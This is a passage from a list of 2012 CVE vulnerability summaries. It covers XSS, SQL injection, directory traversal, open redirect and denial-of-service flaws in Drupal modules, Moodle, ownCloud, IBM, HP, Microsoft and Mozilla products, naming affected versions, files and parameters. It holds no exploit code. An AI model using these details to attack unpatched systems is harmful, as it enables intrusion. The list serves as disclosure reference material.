manager (AWCM) 2.2 does not restrict the number of comment records that can be submitted through HTTP requests, which allows remote attackers to cause a denial of service (disk consumption) via the coment parameter to (1) show_video.php or (2) topic.php. [CVE-2012-2437] cookie_gen.php in ar web content manager (AWCM) 2.2 does not require authentication, which allows remote attackers to generate arbitrary cookies via the name parameter in conjunction with the content parameter. [CVE-2012-2436] Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to inject arbitrary web script or HTML via (1) an arbitrary parameter in a move or (2) minimize action to admin/admin_index.php [CVE-2012-2414] main/manager.c in the Manager Interface in Asterisk Open Source 1.6.2.x before 1.6.2.24, 1.8.x before 1.8.11.1, and 10.x before 10.3.1 and Asterisk Business Edition C.3.x before C.3.7.4 does not properly enforce System class authorization requirements, which allows remote authenticated users to execute arbitrary commands via (1) the originate action in the MixMonitor application, (2) the SHELL and EVAL functions in the GetVar manager action, or (3) the SHELL and EVAL functions in the Status manager action. [CVE-2012-2399] Cross-site scripting (XSS) vulnerability in swfupload.swf in SWFupload 2.2.0.1 and earlier, as used in WordPress before 3.5.2, TinyMCE Image Manager 1.1 and earlier, and other products allows remote attackers to inject arbitrary web script or HTML via the buttonText parameter, a different vulnerability than CVE-2012-3414. [CVE-2012-2398] Cross-site scripting (XSS) vulnerability in files/ajax/download.php in ownCloud before 3.0.3 allows remote attackers to inject arbitrary web script or HTML via the files parameter, a different vulnerability than CVE-2012-2269.4. [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role. [CVE-2012-2374] CRLF injection vulnerability in the tornado.web.RequestHandler.set_header function in Tornado before 2.2.1 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted input. [CVE-2012-2372] The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel 3.7.4 and earlier allows local users to cause a denial of service (BUG_ON and kernel panic) by establishing an RDS connection with the source IP address equal to the IPoIB interface's own IP address, as demonstrated by rds-ping. [CVE-2012-2371] Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. [CVE-2012-2365] Cross-site scripting (XSS) vulnerability in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via the idnumber field to cohort/edit.php. [CVE-2012-2364] Cross-site scripting (XSS) vulnerability in lib/filelib.php in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via an assignment submission with zip compression, leading to text/html rendering during a "download all" action. [CVE-2012-2362] Cross-site scripting (XSS) vulnerability in blog/lib.php in the blog implementation in Moodle 1.9.x before 1.9.18, when Internet Explorer is used, allows remote attackers to inject arbitrary web script or HTML via a crafted parameter to blog/index.php. [CVE-2012-2361] Cross-site scripting (XSS) vulnerability in admin/webservice/forms.php in the web services implementation in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via the name field (aka the service name) to admin/webservice/service.php. [CVE-2012-2360] Cross-site scripting (XSS) vulnerability in the Wiki subsystem in Moodle 2.0.x before 2.0.9, 2.1.x before 2.1.6, and 2.2.x before 2.2.3 allows remote authenticated users to inject arbitrary web script or HTML via a crafted string that is inserted into a page title. [CVE-2012-2339] Cross-site scripting (XSS) vulnerability in the Glossary module 6.x-1.x before 6.x-1.8 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "taxonomy information." [CVE-2012-2331] Cross-site scripting (XSS) vulnerability in serendipity/serendipity_admin_image_selector.php in Serendipity before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the serendipity[textarea] parameter. NOTE: this issue might be resultant from cross-site request forgery (CSRF). [CVE-2012-2326] Cross-site scripting (XSS) vulnerability in the Admin Control Panel (ACP) in MyBB (aka MyBulletinBoard) before 1.6.7 allows remote administrators to inject arbitrary web script or HTML via a malformed file name in an orphaned attachment. [CVE-2012-2310] Cross-site scripting (XSS) vulnerability in the cctags module for Drupal 6.x-1.x before 6.x-1.10 and 7.x-1.x before 7.x-1.10 allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2309] Cross-site scripting (XSS) vulnerability in the Glossify Internal Links Auto SEO module for Drupal 6.x-2.5 and earlier allows remote authenticated users with certain roles to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2308] Cross-site scripting (XSS) vulnerability in the Taxonomy Grid : Catalog module for Drupal 6.x-1.6 and earlier allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2300] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart module 6.x-2.x before 6.x-2.8 and 7.x-3.x before 7.x-3.1 for Drupal allow remote authenticated users with the administer product classes permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2298] Multiple cross-site scripting (XSS) vulnerabilities in the RealName module 6.x-1.x before 6.x-1.5 for Drupal allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) "user names in page titles" and (2) "autocomplete callbacks." [CVE-2012-2297] Multiple cross-site scripting (XSS) vulnerabilities in the Creative Commons module 6.x-1.x before 6.x-1.1 for Drupal allow remote authenticated users with the administer creative commons permission to inject arbitrary web script or HTML via the (1) creativecommons_user_message or (2) creativecommons_site_license_additional_text parameter. [CVE-2012-2294] EMC RSA Archer SmartSuite Framework 4.x and RSA Archer GRC 5.x before 5.2SP1 allow remote attackers to conduct clickjacking attacks via a crafted web page. [CVE-2012-2289] EMC ApplicationXtender Desktop before 6.5 SP2 and ApplicationXtender Web Access .NET before 6.5 SP2 allow remote attackers to upload files to any location, and possibly execute arbitrary code, via unspecified vectors. [CVE-2012-2280] EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 do not properly use frames, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to a "Cross frame scripting vulnerability." [CVE-2012-2279] Open redirect vulnerability in the Security Console in EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2278] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Self-Service Console and (2) Security Console in EMC RSA Authentication Manager 7.1 before SP4 P14 and RSA SecurID Appliance 3.0 before SP4 P14 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2274] Cross-site scripting (XSS) vulnerability in pivotx/ajaxhelper.php in PivotX 2.3.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2012-2270] Open redirect vulnerability in index.php (aka the Login Page) in ownCloud before 3.0.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_url parameter. [CVE-2012-2269] Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) an arbitrary field to apps/contacts/ajax/addcard.php, (2) the parameter parameter to apps/contacts/ajax/addproperty.php, (3) the name parameter to apps/contacts/ajax/createaddressbook, (4) the file parameter to files/download.php, or the (5) name, (6) user, or (7) redirect_url parameter to files/index.php. [CVE-2012-2253] Cross-site scripting (XSS) vulnerability in group/members.php in Mahara 1.5.x before 1.5.7 and 1.6.x before 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2012-2247] Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML via vectors related to artefact/file/ and a crafted SVG file. [CVE-2012-2243] Cross-site scripting (XSS) vulnerability in Mahara 1.4.x before 1.4.5 and 1.5.x before 1.5.4 allows remote attackers to inject arbitrary web script or HTML by uploading an XML file with the xhtml extension, which is rendered inline as script. NOTE: this can be leveraged with CVE-2012-2244 to execute arbitrary code without authentication, as demonstrated by modifying the clamav path. [CVE-2012-2235] Cross-site scripting (XSS) vulnerability in Support Incident Tracker (SiT!) 3.65 and earlier allows remote attackers to inject arbitrary web script or HTML via the id parameter to index.php, which is not properly handled in an error message. [CVE-2012-2234] Cross-site scripting (XSS) vulnerability in sources/users.queries.php in TeamPass before 2.1.6 allows remote authenticated users to inject arbitrary web script or HTML via the login parameter in an add_new_user action. [CVE-2012-2212] DISPUTED McAfee Web Gateway 7.0 allows remote attackers to bypass the access configuration for the CONNECT method by providing an arbitrary allowed hostname in the Host HTTP header. NOTE: this issue might not be reproducible, because the researcher did not provide configuration details for the vulnerable system, and the observed behavior might be consistent with a configuration that was (perhaps inadvertently) designed to allow access based on Host HTTP headers. [CVE-2012-2211] Cross-site scripting (XSS) vulnerability in phpgwapi/inc/common_functions_inc.php in eGroupware before 1.8.004.20120405 allows remote attackers to inject arbitrary web script or HTML via the menuaction parameter to etemplate/process_exec.php. NOTE: some of these details are obtained from third party information. [CVE-2012-2209] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in Piwigo before 2.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) section parameter in the configuration module, (2) installstatus parameter in the languages_new module, or (3) theme parameter in the theme module. [CVE-2012-2206] The Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier allows remote authenticated users to read files of arbitrary users via vectors involving a username in a URI, as demonstrated by a modified metadata=fteSamplesUser field to the /transfer URI. [CVE-2012-2205] Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a workspace query. [CVE-2012-2199] The server message channel agent in the queue manager in the server in IBM WebSphere MQ 7.0.1 before 7.0.1.9, 7.1, and 7.5 on Solaris allows remote attackers to cause a denial of service (invalid address alignment exception and daemon crash) via vectors involving a multiplexed channel. [CVE-2012-2193] Cross-site scripting (XSS) vulnerability in Query Studio in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2190] IBM Global Security Kit (aka GSKit), as used in IBM HTTP Server in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1, allows remote attackers to cause a denial of service (daemon crash) via a crafted ClientHello message in the TLS Handshake Protocol. [CVE-2012-2184] Session fixation vulnerability in IBM Maximo Asset Management 7.1 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2012-2183] Session fixation vulnerability in IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2012-2181] Directory traversal vulnerability in the Dojo module in IBM WebSphere Portal 7.0.0.1 and 7.0.0.2 before CF14, and 8.0, allows remote attackers to read arbitrary files via a crafted URL. [CVE-2012-2177] Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors related to the search feature. [CVE-2012-2172] Cross-site scripting (XSS) vulnerability in SoftwareRegistration.do in the Storage Manager Profiler in IBM System Storage DS Storage Manager before 10.83.xx.18 on DS Series devices allows remote attackers to inject arbitrary web script or HTML via the updateRegn parameter. [CVE-2012-2170] The Application Snoop Servlet in IBM WebSphere Application Server 7.0 before 7.0.0.23 does not properly restrict access, which allows remote attackers to obtain sensitive client and request information via a direct request. [CVE-2012-2169] Cross-site scripting (XSS) vulnerability in the file-upload functionality in the Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 allows remote authenticated users to inject arbitrary web script or HTML via the File Description field. [CVE-2012-2164] The Web client in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to bypass intended access restrictions, and use the Site Administration menu to modify system settings, via a parameter-tampering attack. [CVE-2012-2163] IBM Scale Out Network Attached Storage (SONAS) 1.1 through 1.3.1 allows remote authenticated administrators to execute arbitrary Linux commands via the (1) Command Line Interface or (2) Graphical User Interface, related to a "code injection" issue. [CVE-2012-2162] The Web Server Plug-in in IBM WebSphere Application Server (WAS) 8.0 and earlier uses unencrypted HTTP communication after expiration of the plugin-key.kdb password, which allows remote attackers to obtain sensitive information by sniffing the network, or spoof arbitrary servers via a man-in-the-middle attack. [CVE-2012-2161] Cross-site scripting (XSS) vulnerability in deferredView.jsp in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to inject arbitrary web script or HTML via a crafted URL. [CVE-2012-2159] Open redirect vulnerability in IBM Eclipse Help System (IEHS), as used in IBM Security AppScan Source 7.x and 8.x before 8.6 and IBM SPSS Data Collection Developer Library 6.0 and 6.0.1, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2156] Multiple cross-site scripting (XSS) vulnerabilities in Plume CMS 1.2.4 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the u_email parameter (aka Authors Email field) to manager/users.php, (2) the u_realname parameter (aka Authors Name field) to manager/users.php, or (3) the c_author parameter (aka Author field) in an ADD A COMMENT section. [CVE-2012-2154] Cross-site scripting (XSS) vulnerability in the CDN2 Video module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2151] Multiple cross-site scripting (XSS) vulnerabilities in SPIP 1.9.x before 1.9.2.o, 2.0.x before 2.0.18, and 2.1.x before 2.1.13 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2144] Session fixation vulnerability in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 allows remote attackers to hijack web sessions via the sessionid cookie. [CVE-2012-2129] Cross-site scripting (XSS) vulnerability in doku.php in DokuWiki 2012-01-25 Angua allows remote attackers to inject arbitrary web script or HTML via the target parameter in an edit action. [CVE-2012-2117] Cross-site scripting (XSS) vulnerability in the Gigya - Social optimization module 6.x before 6.x-3.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2115] SQL injection vulnerability in interface/login/validateUser.php in OpenEMR 4.1.0 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the u parameter. [CVE-2012-2112] Cross-site scripting (XSS) vulnerability in the Exception Handler in TYPO3 4.4.x before 4.4.15, 4.5.x before 4.5.15, 4.6.x before 4.6.8, and 4.7 allows remote attackers to inject arbitrary web script or HTML via exception messages. [CVE-2012-2099] Multiple cross-site scripting (XSS) vulnerabilities in Wikidforum 2.10 allow remote attackers to inject arbitrary web script or HTML via the (1) search field, or the (2) Author or (3) select_sort parameters in an advanced search. [CVE-2012-2094] Cross-site scripting (XSS) vulnerability in the refresh mechanism in the log viewer in horizon/static/horizon/js/horizon.js in OpenStack Dashboard (Horizon) folsom-1 and 2012.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the guest console. [CVE-2012-2084] Cross-site scripting (XSS) vulnerability in the Printer, email and PDF versions module 6.x-1.x before 6.x-1.15 and 7.x-1.x before 7.x-1.0 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably the PATH_INFO. [CVE-2012-2083] Cross-site scripting (XSS) vulnerability in the fusion_core_preprocess_page function in fusion_core/template.php in the Fusion module before 6.x-1.13 for Drupal allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2012-2082] Cross-site scripting (XSS) vulnerability in the Chaos tool suite (aka CTools) module 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with the post comments permission to inject arbitrary web script or HTML via a user signature. [CVE-2012-2076] Cross-site scripting (XSS) vulnerability in the administration forms in the ShareThis module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with administer sharethis permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2075] Cross-site scripting (XSS) vulnerability in the Contact Save module 6.x-1.x before 6.x-1.5 for Drupal allows remote authenticated users with the access site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2072] Cross-site scripting (XSS) vulnerability in the Share Buttons (AddToAny) module 6.x-3.x before 6.x-3.4 for Drupal allows remote authenticated users with the administer addtoany permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2071] Cross-site scripting (XSS) vulnerability in the Contact Forms module 6.x-1.x before 6.x-1.13 for Drupal when the core contact form is enabled, allows remote authenticated users with the administer site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2070] Cross-site scripting (XSS) vulnerability in the MultiBlock module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the administer blocks permission to inject arbitrary web script or HTML via the block title. [CVE-2012-2068] Multiple cross-site scripting (XSS) vulnerabilities in fancy_slide.module in the Fancy Slide module before 6.x-2.7 for Drupal allow remote authenticated users with the administer fancy_slide permission to inject arbitrary web script or HTML via the (1) node_title or (2) nodequeue_title parameter. [CVE-2012-2066] Cross-site scripting (XSS) vulnerability in the FCKeditor module 6.x-2.x before 6.x-2.3 and the CKEditor module 6.x-1.x before 6.x-1.9 and 7.x-1.x before 7.x-1.7 for Drupal allows remote authenticated users or remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2065] Cross-site scripting (XSS) vulnerability in the Language Icons module 6.x-2.x before 6.x-2.1 and 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with administer languages permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2064] Cross-site scripting (XSS) vulnerability in theme/views_lang_switch.theme.inc in the Views Language Switcher module before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2012-2062] Open redirect vulnerability in the Redirecting click bouncer module for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2060] Cross-site scripting (XSS) vulnerability in the Admin tools module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2059] Cross-site scripting (XSS) vulnerability in the ticketyboo News Ticker module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2022] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i (NNMi) 8.x, 9.0x, 9.1x, and 9.20 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2021] Multiple cross-site scripting (XSS) vulnerabilities in HP AssetManager 5.20, 5.21, 5.22, and 9.30 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2018] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 8.x, 9.0x, and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2011] Multiple cross-site scripting (XSS) vulnerabilities in HP Web Jetadmin 8.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2008] Cross-site scripting (XSS) vulnerability in HP Performance Insight for Networks 5.3.x, 5.41, 5.41.001, and 5.41.002 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2005] Cross-site scripting (XSS) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2004] Open redirect vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2002] Open redirect vulnerability in HP SNMP Agents for Linux before 9.0.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2001] Cross-site scripting (XSS) vulnerability in HP SNMP Agents for Linux before 9.0.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1992] Cross-site scripting (XSS) vulnerability in admin/edituser.php in CMS Made Simple 1.10.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter (aka the Email Address field in the Edit User template). [CVE-2012-1990] Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric Kerweb before 3.0.1 and Kerwin before 6.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the evtvariablename parameter in an evts.xml action to kw.dll, (2) unspecified search fields, or (3) unspecified content-display fields. [CVE-2012-1984] Multiple cross-site scripting (XSS) vulnerabilities in RealNetworks Helix Server and Helix Mobile Server 14.x before 14.3.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1982] Cross-site scripting (XSS) vulnerability in my_admin/admin1_list_pages.php in SocialCMS 1.0.2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the TR_title parameter in an edit action. [CVE-2012-1979] Cross-site scripting (XSS) vulnerability in starnet/index.php in SyndeoCMS 3.0.01 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the email parameter (aka Email address field) in an edit_user configuration action. [CVE-2012-1963] The Content Security Policy (CSP) functionality in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 does not properly restrict the strings placed into the blocked-uri parameter of a violation report, which allows remote web servers to capture OpenID credentials and OAuth 2.0 access tokens by triggering a violation. [CVE-2012-1961] Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 do not properly handle duplicate values in X-Frame-Options headers, which makes it easier for remote attackers to conduct clickjacking attacks via a FRAME element referencing a web site that produces these duplicate values. [CVE-2012-1953] The ElementAnimations::EnsureStyleRuleFor function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 allows remote attackers to cause a denial of service (buffer over-read, incorrect pointer dereference, and heap-based buffer overflow) or possibly execute arbitrary code via a crafted web site. [CVE-2012-1952] The nsTableFrame::InsertFrames function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 does not properly perform a cast of a frame variable during processing of mixed row-group and column-group frames, which might allow remote attackers to execute arbitrary code via a crafted web site. [CVE-2012-1935] Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4.x before 4 RC4 allow remote attackers to inject arbitrary web script or HTML via the (1) Back parameter to admin/ad.php, or the (2) token or (3) f_email parameter to admin/password_check_token.php. [CVE-2012-1920] @Mail WebMail Client in AtMail Open-Source 1.04 and earlier allows remote attackers to obtain configuration information via a direct request to install/info.php, which calls the phpinfo function. [CVE-2012-1919] CRLF injection vulnerability in mime.php in @Mail WebMail Client in AtMail Open-Source before 1.05 allows remote attackers to conduct directory traversal attacks and read arbitrary files via a %0A sequence followed by a .. (dot dot) in the file parameter. [CVE-2012-1918] Multiple directory traversal vulnerabilities in (1) compose.php and (2) libs/Atmail/SendMsg.php in @Mail WebMail Client in AtMail Open-Source before 1.05 allow remote attackers to read arbitrary files via a .. (dot dot) in the Attachment[] parameter. [CVE-2012-1917] compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 does not properly handle ../ (dot dot slash) sequences in the unique parameter, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ..././ (dot dot dot slash dot slash) sequence. [CVE-2012-1916] @Mail WebMail Client in AtMail Open-Source before 1.05 allows remote attackers to execute arbitrary code via an e-mail attachment with an executable extension, leading to the creation of an executable file under tmp/. [CVE-2012-1912] Cross-site scripting (XSS) vulnerability in preferences.php in PHP Address Book 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the from parameter. NOTE: the index.php vector is already covered by CVE-2008-2566. [CVE-2012-1908] Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2012-1900] Cross-site request forgery (CSRF) vulnerability in admin/index.php in RazorCMS 1.2.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary web pages via a showcats action. [CVE-2012-1899] Multiple cross-site scripting (XSS) vulnerabilities in webfolio/admin/users/edit in Webfolio CMS 1.1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) First name, (2) Last name or (3) Email (required) fields. [CVE-2012-1898] Multiple cross-site scripting (XSS) vulnerabilities in wolfcms/admin/user/add in Wolf CMS 0.75 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user[name], (2) user[email], or (3) user[username] parameters. [CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability." [CVE-2012-1889] Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. [CVE-2012-1882] Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Scrolling Events Information Disclosure Vulnerability." [CVE-2012-1872] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka "EUC-JP Character Encoding Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability." [CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability." [CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability." [CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability." [CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability." [CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability." [CVE-2012-1842] Cross-site scripting (XSS) vulnerability in checkQKMProg.htm on the Quantum Scalar i500 tape library with firmware before i7.0.3 (604G.GS00100), also distributed as the Dell ML6000 tape library with firmware before A20-00 (590G.GS00100), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-1837] The (1) webreports, (2) post/create-role, and (3) post/update-role programs in IBM Tivoli Endpoint Manager (TEM) before 8.2 do not include the HTTPOnly flag in a Set-Cookie header for a cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie. [CVE-2012-1835] Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php [CVE-2012-1829] Multiple cross-site scripting (XSS) vulnerabilities in AutoFORM PDM Archive before 6.920 allow remote authenticated users to inject arbitrary web script or HTML via unspecified fields. [CVE-2012-1827] The web service in AutoFORM PDM Archive before 7.1 does not have authorization requirements, which allows remote authenticated users to 